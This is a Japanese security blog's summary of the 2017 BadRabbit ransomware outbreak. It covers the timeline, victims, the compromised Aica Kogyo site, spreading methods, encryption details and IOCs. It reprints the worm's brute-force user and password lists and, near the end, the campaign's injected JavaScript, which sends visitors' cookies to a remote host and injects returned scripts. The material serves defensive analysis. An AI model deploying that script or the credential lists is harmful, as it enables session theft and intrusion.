2017年10月24日夜(日本時間)からウクライナやロシアを中心にランサムウェア「BadRabbit」に感染し、被害を受けたとの情報が出回っています。ここではBadRabbitに関連する情報についてまとめます。
タイムライン
日時 | 出来事 | |
---|---|---|
2016年9月8日 | 一連のキャンペーンに関連するとみられる通信先でRiskIQにより最初に観測された日。 | |
2017年2月頃 | FireEyeが攻撃にも利用されたJavaScriptフレームワークを観測。*1 | |
2017年10月6日 | アイカ工業のサーバーが不正アクセスを受ける。 | |
〃 17時2分 | アイカ工業のWebサイトが改ざんされる。 | |
2017年10月9日 | アイカ工業のサーバーが不正アクセスを受ける。 | |
2017年10月24日 17時頃 | BadRabbitの拡散が始まる。 | |
〃 21時26分 | InterfaxがTwitterを通じてWebサイトに障害が発生していると報告。*2 | |
〃 23時37分 | この日時までアイカ工業のWebサイトがされていた。 | |
〃 24時頃 | BadRabbitの拡散を行っていたWebサイトが停止する。 | |
〃 | ウクライナのCERT-UAがさらなる攻撃の可能性があるとして注意喚起。*3 | |
〃 | US-CERTがBadRabbitによる感染報告を複数受けているとして情報公開。*4 | |
2017年10月25日 1時 | ウクライナ保安庁が同国内で確認されたインシデントに対する情報提供、及び注意喚起。*5 | |
〃 | 海外のセキュリティソフト会社よりアイカ工業のWebサイトがサイバー攻撃悪用の疑いがあると情報発信。*6 | |
〃 12時17分 | アイカ工業は同社Webサイトを一時閉鎖。 | |
2017年10月26日 8時45分 | アイカ工業はWebサイトへ攻撃の疑いがあると発表。 | |
〃 15時30分 | アイカ工業はWebサイトが一時的に改ざんされた痕跡を確認と発表。 | |
〃 17時頃 | IPAがBadRabbitに対して注意喚起。*7 | |
〃 22時20分 | Cisco(Talos)がBadRabbitの拡散機能にEternalRomanceが利用されていると指摘。 | |
2017年11月2日 19時10分 | アイカ工業が続報としてWebサイトが改ざんされていた可能性がある期間を発表。 | |
2017年11月20日 9時 | アイカ工業がWebサイトを再開。最終報を発表。 |
被害状況
- 現在報道されている被害の多くはロシアを中心に、ウクライナ等の東欧地方で発生している。
BadRabbitの影響を受けたとみられる具体名が出ている組織
組織名 | 国 | 被害・影響の概要 |
---|---|---|
インタファクス通信 | ロシア | Webサイトなどの一部のサービスに障害発生。 |
フォンタンカ出版 | ロシア | サーバーが攻撃を受け障害発生。*8 |
オデッサ国際空港 | ウクライナ | 職員が旅客データを手入力による対応に変更となった。 これを受け当該空港を利用する数便に遅れが生じた。 |
キエフ地下鉄 | ウクライナ | 決済システムで障害が発生した。列車運行への影響はなかった。 |
セキュリティ組織の把握状況
セキュリティ組織 | 把握している被害状況 |
---|---|
NCSC | BadRabbitの影響を受けた報告は一切受けていない。*9 |
IPA | 多くの機関において業務に支障が出るなどの深刻な影響が発生している。 |
ESET | 被害の半分以上はロシアで発生。 観測された割合はロシア65%、ウクライナ12.2%、ブルガリア10.2%、トルコ6.4%、日本3.8%、その他2.4% |
Kaspersky | KSNの統計では全体として約200の端末で攻撃を確認。 大半はロシア。この他にウクライナ、トルコ、ドイツ等でも確認している。 |
TrendMicro | SPNの統計では日本国内での検出は確認されていない。 改ざんされたサイトはデンマーク、アイルランド、トルコ、ロシアで確認。 25日17時半時点でロシア110台、カザフスタン3台、ウクライナ1台の計114台をブロックした。 |
Symantec | 感染試行の検出の大半はロシアで最初に現れてから2時間後に発生。 感染試行の国別の検出状況はロシア86%、日本3%、ブルガリア2%、ウクライナ1%、アメリカ1%、その他7% |
Avast | 15か国のユーザーでBadRabbitを検出 それぞれの検出率はロシアが71%、ウクライナ14%、ブルガリア8%。 ポーランド、US、ルーマニアなどでも検出しているが1%以下。 |
ランサムウェア「BadRabbit」について
- ランサムウェアであり、特定の拡張子に該当するファイルとMBRを暗号化し感染端末を使用不可にする。
- 脅迫として求められる金額は最初は0.05ビットコイン。
- 表示される時間が過ぎると身代金が増額される。
- BadRabbitに存在する暗号化機能にバグが存在することをkasperskyが確認している。
BadRabbitと呼ばれる由来
Bad Rabbit TOR Payment Site. pic.twitter.com/xi8RBTgK49
— BleepingComputer (@BleepinComputer) 2017年10月24日
感染経路(1):改ざんされたサイトの閲覧による感染
感染経路(2):BadRabbitの拡散機能による感染
- 企業内ネットワークを狙ったものとみられており、ネットワーク内の拡散機能が実装されている。
- 拡散機能はNotPetyaで見られた手口と同様の方法がとられている。
- SMB経由で他のコンピュータに拡散する。
- Mimikatzツールを使用して資格情報の抽出を試行する。*12
- コード内に書き込まれたID、パスワードを用いて別の端末に感染を拡大させようとする。*13
- 脆弱性の利用はないと当初見られていた*14が、26日頃にCisco、TrendMicroがEternalRomanceが利用されていると指摘。
- MBSDは「EternalSynergy」の通信と類似していると指摘。
- EternalRomanceで利用される脆弱性はMS17-010で修正されたCVE-2017-0145。
- クレデンシャルの一覧は研究者により公開されている。*15
- 埋め込まれている4つのパスワード文字列は映画「ハッカー」の劇中でもっとも一般的なパスワードとされる文字列。
認証試行に用いられるユーザーID文字列
Administrator,Admin,Guest,User,User1,user-1Test,root,buh,boss,ftp,rdp,rdpuser,rdpadmin,manager,
support,work,other user,operator,backup,asus,ftpuser,ftpadmin,nas,nasuser,nasadmin,superuser,netguest,alex
認証試行に用いられるパスワード文字列
Administrator,administrator,Guest,guest,User,user,Admin,adminTest,test,root,123,1234,12345,123456,1234567,
12345678,123456789,1234567890,Administrator123,administrator123,Guest123,guest123,User123,user123,Admin123,
admin123Test123,test123,password,111111,55555,77777,777,qwe,qwe123,qwe321,qwer,qwert,qwerty,qwerty123,zxc,
zxc123,zxc321,zxcv,uiop,123321,321,love,secret,sex,god
BadRabbitの暗号化機能
- AES-128bitで暗号化される。
- AES-128bitの暗号化鍵はRSA-2048bit公開鍵により暗号化される。
- 暗号化されたファイルの終端に「ecrypted」と追加する。
暗号化される対象の拡張子
.3ds .7z .accdb .ai .asm .asp .aspx .avhd .back .bak .bmp .brw .c .cab .cc .cer .cfg .conf .cpp .crt .cs .ctl .cxx .dbf .der .dib .disk .djvu .doc .docx .dwg .eml .fdb .gz .h .hdd .hpp .hxx .iso .java .jfif .jpe .jpeg .jpg .js .kdbx .key .mail .mdb .msg .nrg .odc .odf .odg .odi .odm .odp .ods .odt .ora .ost .ova .ovf .p12 .p7b .p7c .pdf .pem .pfx .php .pmf .png .ppt .pptx .ps1 .pst .pvi .py .pyc .pyw .qcow .qcow2 .rar .rb .rtf .scm .sln .sql .tar .tib .tif .tiff .vb .vbox .vbs .vcb .vdi .vfd .vhd .vhdx .vmc .vmdk .vmsd .vmtm .vmx .vsdx .vsv .work .xls .xlsx .xml .xvd .zip
組み込まれたRSA-2048の公開鍵
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5clDuVFr5sQxZ+feQlVvZcEK0k4uCSF5SkOkF9A3tR6O/xAt89/PVhowvu2TfBTRsnBs83hcFH8hjG2V5F5DxXFoSxpTqVsR4lOm5KB2S8ap4TinG/GN/SVNBFwllpRhV/vRWNmKgKIdROvkHxyALuJyUuCZlIoaJ5tB0YkATEHEyRsLcntZYsdwH1P+NmXiNg2MH5lZ9bEOk7YTMfwVKNqtHaX0LJOyAkx4NR0DPOFLDQONW9OOhZSkRx3V7PC3Q29HHhyiKVCPJsOW1l1mNtwL7KX+7kfNe0CefByEWfSBt1tbkvjdeP2xBnPjb3GE1GA/oGcGjrXc6wV8WKsfYQIDAQAB
この他に実装されている機能など
- ウィルス対策ソフトの無効化が表示される*16
- BadRabbitの感染プロセスとして、3つのジョブが登録、実行される。
- ジョブ名に利用されている文字列からBadRabbitの関係者は「Game Of Thrones」のファンではないかとKasperskyは分析している。
ジョブ名などに登場する文字列
ジョブ名等の文字列 | Game Of Thronesでの役割 | ジョブの動き |
---|---|---|
rhaegal | Rhaegar Targaryen王子にちなんで名づけられた。3匹のドラゴンの1つ。 | dispci.exeとdrogon.jobを実行する。 |
dorogon | Khal Drogoにちなんで名づけられた。3匹のドラゴンの1つ。 | PCをシャットダウンし、暗号化を実行。身代金文書を表示する。 |
viserion (viserion_) |
Night Kingが殺されワイトとして復活したドラゴン。3匹のドラゴンの1つ。 | 2度目の再起動時に実行。スクリーンロックし、身代金要求画面を表示。 |
GrayWorm | Kasperskyによれば登場人物との紹介されているが、同名の人物は存在しないとみられる。 似た名前として同作に登場する司令官Grey Wormが存在する。 |
過去観測されたランサムウェアとの関連性分析
コメント元 | 対象のランサムウェア | 関連の有無 | 見解 | |
---|---|---|---|---|
Group-IB | NotPetya | 肯定 | NotPetyaを修正したものと解析している。 | |
ESET | Petya | 肯定 | Petya(Penza)の変種と解析している。 | |
Kaspersky | NotPetya | 肯定 | コードの一部の一致、ドメインのリストが同一、拡散方法が類似等から背後にいる関係者は同じとの見方。 | |
IntezerLabs | NotPetya | 否定? | 同社リサーチャーはコードの類似率は13%であると分析。*18 | |
PwC | NotPetya | 肯定 | 同社脅威アナリストはNotPetyaとBadRabbitの表層的な差異分析をした結果、両者に密接な関連がみられる*19 | |
Bitdefender | GoldenEye/NotPetya | 肯定 | 構造的に、そしてより広い焦点からも極めて似ている。 | |
Cisco(Talos) | NotPetya(Nyetya) | 肯定 | BadRabbitとNyetyaのコアコードは同じベース上に構築されている。 両マルウェアのビルドツールチェーンは非常に似ている。 絶対的なつながりを示す証拠はないが両マルウェアの作成者は同じであるといった確信を持っている。 |
|
@Adam_Cyber | NotPetya | 肯定 | DLLを共有かつ67%が同一のコードベースである。 これら攻撃は同じスレットアクターが背後にいる可能性。*20 |
改ざんされた恐れのあるサイト一覧にアイカ工業のドメイン名が含まれる
『ただいまメンテナンス中です』 pic.twitter.com/ujKE4QZjjH
— piyokango (@piyokango) 2017年10月25日
- 2017年10月26日 [PDF] 弊社ホームページに対するサイバー攻撃の疑いについて
- 2017年10月26日 [PDF] 弊社ホームページに対するサイバー攻撃の疑いについて【第2報】
- 2017年11月02日 [PDF] 弊社ホームページに対するサイバー攻撃について【第3報】
- 2017年11月20日 [PDF] アイカホームページ再開のお知らせ(弊社ホームページに対するサイバー攻撃について【最終報】)
経緯
改ざんの状況
- 報道によれば10月14日に改ざんされた。RiskIQの分析では12日に改ざんが確認され、少なくとも19日まで確認されている。
その後の調査により10月6日から10月24日にかけて改ざんされていた恐れがあったことがアイカ工業の続報により明らかにされた。 - アイカ工業のカタログを閲覧した社員のPCが不正なサイトに接続試行した記録が確認された。*22
- サーバー上での被害はコンテンツの改ざんのみ確認された(情報漏えい等それ以外の被害なし)。改ざんはランサムウェアの配布に悪用されたものとみられる。
- 不正アクセスを受けた原因はFWでのアクセス制御の不備、SSHにセキュリティ上の脆弱性が存在したことによる。
- SSHはメンテナンス用。改ざんにはSFTPが悪用された可能性が高いとの調査結果。*23
- 改ざんされた間のアクセス件数は16,555件。11月20日の最終報時点でアイカ工業へ被害報告は寄せられていない。
BadRabbit関連情報(IOC情報)
ファイル
ファイル名 | 機能 | Sha256 |
---|---|---|
install_flash_player.exe FlashUtil.exe |
ドロッパー | 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da |
infpub.dat | dispci.exeの起動タスクを作成。 RSA暗号を利用して対象ファイルを暗号化。 |
579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648 141d45d650580ed4b0d0fc4b8fd5448da67b30afbe07781da02c39d345a8f4a0 |
dispci.exe | 別のブートローダーをインストール。 マシンを起動不可とする。 |
8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93 |
cscc.dat | 32ビット版のDiskCryptor用ドライバ | 682ADCB55FE4649F7B22505A54A9DBC454B4090FC2BB84AF7DB5B0908F3B7806 |
〃 | 64ビット版のDiskCryptor用ドライバ | 0b2f863f4119dc88a22cc97c0a136c88a0127cb026751303b045f7322a8972f6 |
Mimikatz | 32ビット版のmimikatz 亜種 | 2f8c54f9fa8e47596a3beff0031f85360e56840c77f71c6a573ace6f46412035 |
〃 | 64ビット版のmimikatz 亜種 | 301b905eb98d8d6bb559c04bbda26628a942b2c4107c07a02e8f753bdcfe347c |
BadRabbit関連の通信先
種別 | 通信先 |
---|---|
埋め込まれていた通信先(1) | 185.149.120[.]3 |
埋め込まれていた通信先(2) | 172.97.69[.]79 (dfkiueswbgfreiwfsd[.]tk) |
埋め込まれていた通信先(3) | 91.236.116[.]50 |
埋め込まれていた通信先(4) | 38.84.134[.]15 |
ドロッパー配布元 | 1dnscontrol[.]com/flash_install.php (5[.]61[.]37[.]209) |
ペイメント先 | caforssztxqzf2nm[.]onion |
同じキャンペーンで利用の恐れがある通信先(ESET) | webcheck01[.]net webdefense1[.]net secure-check[.]host firewebmail[.]com secureinbox[.]email secure-dns1[.]net |
改ざんされていた恐れのあるWebサイト
- 埋め込まれていた通信先(1) 185.149.120[.]3
aica[.]co[.]jp
www[.]dermavieskin[.]com
grupovo[.]bg
www[.]fitnes-trener[.]com[.]ua
www[.]afaceri-poligrafice[.]ro
grandua[.]ua
i24[.]com[.]ua
scanstockphoto[.]com
izgodni[.]bg
www[.]biotechusa[.]ru
www[.]mediaport[.]ua
www[.]armoniacenter[.]com
sweet-home[.]dn[.]ua
- 埋め込まれていた通信先(2) 172.97.69[.]79
www[.]chnu[.]edu[.]ua
fitnes-trener[.]com[.]ua
www[.]t[.]ks[.]ua
www[.]fastfwd[.]ru
www[.]uscc[.]ua
bitte[.]net[.]ua
www[.]fitnes-trener[.]com[.]ua
ophthalmolog[.]kiev[.]ua
grandua[.]ua
i24[.]com[.]ua
akvadom[.]kiev[.]ua
ulianarudich[.]com[.]ua
football[.]zp[.]ua
www[.]mediaport[.]ua
chnu[.]edu[.]ua
evroremont[.]kharkov[.]ua
thecovershop[.]pl
www[.]tofisa[.]com
cream-dream[.]com[.]ua
go2odessa[.]ru
bahmut[.]com[.]ua
- 埋め込まれていた通信先(3) 91.236.116[.]50
abantyoreselurunler[.]com
aldingareefretreat[.]com
ftp9[.]net
magicofis[.]com
piiz[.]tk
tedizmir[.]k12[.]tr
websgramly[.]com
www[.]andronova[.]net
www[.]detaymaxinet[.]com
www[.]fikracenneti[.]com
www[.]gulenturizm[.]com[.]tr
www[.]ilgihastanesi[.]com
www[.]komedibahane[.]com
www[.]moonlightcinemaclub[.]com
www[.]musterihizmetlerinumarasi[.]com
www[.]techkafa[.]net
www[.]teknolojihaber[.]net
www[.]vertizontal[.]ro
- 埋め込まれていた通信先(4) 38.84.134[.]15
izgodni[.]bg
montenegro-today[.]com
scanstockphoto[.]com
www[.]grupovo[.]bg
www[.]matasedita[.]sk
www[.]montenegro-today[.]com
www[.]myk104[.]com
www[.]nadupanyfanusik[.]sk
www[.]otbrana[.]com
www[.]sinematurk[.]com
www[.]ucarsoft[.]com
ペイメント先 Bitcoin ウォレット (公開されているもの)
キャンペーンに利用されたJavaScript
- IPアドレス、ブラウザ、参照元サイトの情報等を収集する機能がある。
- RiskIQの記事中に当該JavaScriptが掲載されている。
var REMOTE_URL = ‘<INJECTION HOST URL>’; var C_TIMEOUT = 20000; function analyze_traffic() { return { ‘Tr.Referer’: document.referrer, ‘Tr.Agent’: navigator.userAgent, ‘Tr.CookieState’: !!document.cookie, ‘Tr.Cookie’: document.cookie, ‘Tr.Domen’: window.location.hostname }; } function execute_request(post, url, callback) { var xhr = init_xhr(); if (!!xhr) { xhr.open(‘POST’, url); xhr.timeout = C_TIMEOUT; xhr.setRequestHeader(‘Content-Type’, ‘application/x-www-form-urlencoded’); xhr.onreadystatechange = function () { if (xhr.readyState == 4 && xhr.status == 200) { callback(xhr.responseText); } }; var content = build_query(post); xhr.send(content); } } function apply_payload(response) { if (response) { var json_result = JSON.parse(response); if (json_result) { var inject_string = urldecode(json_result.InjectionString); if (json_result.InjectionType === 1) { window.location = inject_string; } else { write_on_page(inject_string); } } } } function write_on_page(content) { var div = document.createElement(‘div’); div.id = ‘response’; div.innerHTML = content; document.body.appendChild(div); var scripts = div.getElementsByTagName(‘script’); if (scripts.length > 0) { for (var i = 0; i < scripts.length; i++) { var script = document.createElement(‘script’); script.innerHTML = scripts[i].innerHTML; document.body.appendChild(script); scripts[i].parentNode.removeChild(scripts[i]); } } } function build_query(post) { var post_query = []; for (var k in post) { if (post.hasOwnProperty(k)) { post_query.push(k + ‘=’ + post[k]); } } return post_query.join(‘&’); } function init_xhr() { if (!!window.XMLHttpRequest) { return new XMLHttpRequest(); } else if (!!window.ActiveXObject) { var xhr_array = [ ‘Msxml2.XMLHTTP.6.0’, ‘Msxml2.XMLHTTP.3.0’, ‘Msxml2.XMLHTTP’, ‘Microsoft.XMLHTTP’ ]; for (var i = 0; i < xhr_array.length; i++) { try { return new ActiveXObject(xhr_array[i]); } catch (e) { } } } } function urldecode(data) { return decodeURIComponent(data).replace(/\+/g, ‘%20’); } // Execute request var traffic = analyze_traffic(); execute_request(traffic, REMOTE_URL, apply_payload);
参考情報(報道、解析、まとめ等)
全国紙・ブロック紙
報道日付 | 新聞社 | 記事名 |
---|---|---|
2017年10月25日朝刊 | 日本経済新聞 | 地下鉄や空港にサイバー攻撃 |
2017年10月25日夕刊 | 毎日新聞 | 大規模サイバー攻撃 身代金ウイルス 日露欧に被害 (共同) |
2017年10月25日夕刊 | 東京新聞 | ロシアや日本などに大規模サイバー攻撃 身代金ウイルス感染 (共同) |
2017年10月26日朝刊 | 産経新聞 | 日本や露にサイバー攻撃 ウクライナ 空港・地下鉄被害 |
セキュリティ組織
- Avast It’s Rabbit season: BadRabbit ransomware infects airports and subways(日本語記事)
- Barkly Everything You Need to Know About BadRabbit
- Bitdefender LABS Bad Rabbit Ransomware Strikes Ukraine, Likely related to GoldenEye
- Carbon Black Threat Advisory & Analysis: ‘Bad Rabbit’ Ransomware
- CERT-RO Bad Rabbit - o nouă campanie ransomware
- Cisco Threat Spotlight: Follow the Bad Rabbit
- Dr.Web Dr.Webに保護されたコンピューターを恐れるBadRabbit : 悪名高いトロイの木馬に関する分析結果
- ESET Kiev metro hit with a new variant of the infamous Diskcoder ransomware
- ESET Bad Rabbit: Not-Petya is back with improved ransomware
- F-Secure Trojan:W32/Rabbad Threat description
- F-Secure The big difference with Bad Rabbit
- FireEye BACKSWING - Pulling a BADRABBIT Out of a Hat
- Fortinet Tracking the Bad Rabbit
- Group-IB BadRabbit There is a connection between BadRabbit and Not Petya
- IPA 感染が拡大中のランサムウェア「Bad Rabbit」の対策について
- ISC BadRabbit: New ransomware wave hitting RU & UA
- JPCERT/CC 新たなランサムウエア「Bad Rabbit」について
- Kaspersky Labs Bad Rabbit ransomware
- Kaspersky Labs Bad Rabbit:新たな大規模ランサムウェア攻撃の兆し
- McAfee ‘BadRabbit’ Ransomware Burrows Into Russia, Ukraine
- McAfee ‘BadRabbit’ Ransomware Burrows Into Russia, Ukraine
- malwarebytes Labs BadRabbit: a closer look at the new version of Petya/NotPetya
- MBSD ランサムウェア「Bad Rabbit」の内部構造を紐解く
- MBSD Bad Rabbit のワーム活動における脆弱性利用について
- Microsoft Ransom:Win32/Tibbar.A
- RiskIQ Down the Rabbit Hole: Tracking the BadRabbit Ransomware to a Long Ongoing Campaign of Target Selection
- RiskIQ BAD RABBIT RANSOMWAREbad rabbitransomware
- Sophos Bad Rabbit ransomware outbreak
- Sophos Bad Rabbit ransomware: What to do
- Symantec BadRabbit: New strain of ransomware hits Russia and Ukraine
- TrendMicro 新しい暗号化型ランサムウェア「Bad Rabbit」、ネットワーク経由で拡散、ウクライナとロシアなどで確認される
- zcaler Bad Rabbit – A new Petya ransomware variant
その他
- 【号外】”BadRabbit”(ランサムウェア)がロシア、ウクライナを中心に感染拡大(忙しい人のためのサイバーセキュリティニュース)
- ランサムウェア『Bad Rabbit』について超絶簡単にまとめてみた。 (にゃんたくのひとりごと)
更新履歴
- 2017年10月25日 PM 新規作成
- 2017年10月26日 AM 続報追記、誤植修正
- 2017年10月26日 PM 続報追記、誤植修正、一部記述(FlashPlayerの偽装、アンチデバッグの実装)の修正
- 2017年10月27日 AM アイカ工業の改ざん関連の続報を追記
- 2017年10月27日 PM NW拡散の手段にEternalRomance利用と追記修正、AESの鍵長を修正(AES-256→AES-128)。
- 2017年11月04日 AM アイカ工業の続報を追記。
- 2017年11月20日 PM アイカ工業の最終報を反映。
*1:国内でも「Bad Rabbit」を観測 - 2月には誘導スクリプトが稼働か,Security NEXT,2017年10月25日アクセス
*2:https://twitter.com/interfax_news/status/922799045088829442
*4:Multiple Ransomware Infections Reported
*5:СБУ блокувала подальше розповсюдження комп’ютерного вірусу
*6:アイカ工業にサイバー攻撃 サイト停止、不正改ざんの疑い,共同通信,2017年10月26日アクセス
*7:https://twitter.com/IPAjp/status/923464685340340224
*8:Вирус-шифровальщик атаковал российские СМИ,Ведомости,2017年10月26日アクセス
*9:Bad Rabbit: Game of Thrones-referencing ransomware hits Europe,thegurdian,2017年10月26日アクセス
*10:ロシアなど複数国でサイバー攻撃、大きな障害なし,TBS,2017年10月25日アクセス
*11:ロシアなどに新たなサイバー攻撃、日本でも被害,Reuters,2017年10月25日アクセス
*12:https://twitter.com/bartblaze/status/922866774693044224
*13:https://twitter.com/MaartenVDantzig/status/922854232176422912
*14:https://twitter.com/LukasStefanko/status/922916146856189952
*15:https://twitter.com/fwosar/status/922866144549228545
*16:https://twitter.com/0xAmit/status/922871446602502145
*17:https://twitter.com/0xAmit/status/922872657116368897
*18:https://twitter.com/jaytezer/status/922875751174758400
*20:https://twitter.com/Adam_Cyber/status/922930877109362694
*21:アイカ工業がWebサイトを一時閉鎖、Bad Rabbitが原因か,ITpro,2017年10月26日アクセス
*22:不正アクセス アイカ工業サイトに改ざんの痕跡 HP停止,毎日新聞,2017年10月27日アクセス
*23:アイカ工業、サイバー攻撃の疑いで閉鎖中だったWebサイトを再開,ITPro,2017年11月21日アクセス